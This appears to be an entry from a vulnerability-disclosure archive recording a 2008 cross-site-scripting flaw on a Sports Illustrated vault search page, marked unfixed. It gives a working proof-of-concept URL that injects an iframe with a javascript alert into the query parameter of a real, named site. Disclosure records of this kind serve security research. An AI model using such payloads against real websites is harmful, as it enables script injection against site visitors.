Security researcher xylitol, has submitted on 27/10/2008 a cross-site-scripting (XSS) vulnerability affecting vault.sportsillustrated.cnn.com, which at the time of submission ranked 52 on the web according to Alexa.
We manually validated and published a mirror of this vulnerability on 12/09/2009. It is currently unfixed.
If you believe that this security issue has been corrected, please send us an e-mail. |
Date submitted: 27/10/2008 |
Date published: 12/09/2009 |
Fixed? Mail us! | Status: UNFIXED |
Author: xylitol |
Domain: vault.sportsillustrated.cnn.com |
Category: XSS |
Pagerank: 52 |
URL: http://vault.sportsillustrated.cnn.com/vault/result/article/index.htm?query=%3Ciframe%20src=%22javas cript:alert(%27XSS%20by%20\nXylitol%27);%22%3E%3C/iframe%3E%3Cmarquee%3E%3Ch1%3EXSS%20by%20Xylitol%3 C/h1%3E%3C/marquee%3E&searchType=mag_article&exactClause=¬Clause=&orClause=&startDt=&endDt=&shoot Id=&sortBy=date¤tPage=1&npp=10 |
Click here to view the mirror
|
|
|